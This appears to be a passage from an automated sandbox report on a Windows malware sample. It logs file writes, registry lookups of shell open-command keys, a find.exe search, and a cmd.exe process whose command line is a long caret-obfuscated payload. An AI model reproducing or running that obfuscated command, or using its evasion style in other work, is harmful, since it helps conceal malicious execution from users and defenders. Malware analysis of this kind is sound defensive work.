File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 66	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 46	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 46	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 98	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 72	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 71	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 65	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 59	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 124	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 49	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 48	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 59	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 55	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 70	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 77	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 71	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 113	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 95	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 75	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 129	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 94	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 87	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 94	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 99	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 67	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 69	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 69	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 89	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 136	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 63	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 66	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 84	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 88	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 85	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 87	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 83	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 82	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 47	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 85	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 60	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 58	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 52	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 91	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 91	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 97	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 96	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 95	1	Fn Data
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.Workspace\Shell\Open\Command	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.Workspace\Shell\Open\Command, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.Workspace\Shell\Open\Command, data = "C:\Program Files\Microsoft Office\Root\Office16\WINPROJ.EXE" "%1" /ou "%u", type = REG_SZ	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 97	1	Fn Data
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS5\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS8\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLTemplate\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XML\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary.1\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity.1\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable.1\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable.1\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2.a\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3.a\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4.a\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.5\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.6\Shell\Open\Command	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.7\Shell\Open\Command	1	Fn
For performance reasons, the remaining 3498 entries are omitted. The remaining entries can be found in glog.xml.

Process #6: find.exe

0

»

Information	Value
ID	#6
File Name	c:\windows\system32\find.exe
Command Line	fINd "SHCm"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:39, Reason: Child Process
Unmonitor	End Time: 00:01:42, Reason: Self Terminated
Monitor Duration	00:00:03
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0xaf0
Parent PID	0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AF4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
find.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	rw	-
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	rw	-
private_0x00000000002d0000	0x002d0000	0x003cffff	Private Memory	rw	-
private_0x00000000004a0000	0x004a0000	0x004affff	Private Memory	rw	-
pagefile_0x00000000004b0000	0x004b0000	0x00637fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000640000	0x00640000	0x007c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007d0000	0x007d0000	0x01bcffff	Pagefile Backed Memory	r	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
find.exe	0xffdc0000	0xffdc7fff	Memory Mapped File	rwx	-
ulib.dll	0x7fee56b0000	0x7fee56d7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff0e0000	0x7feff1bafff	Memory Mapped File	rwx	-
sechost.dll	0x7feff1c0000	0x7feff1defff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feffc50000	0x7feffd7cfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd3fff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Process #7: cmd.exe

205

0

»

Information	Value
ID	#7
File Name	c:\windows\system32\cmd.exe
Command Line	Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 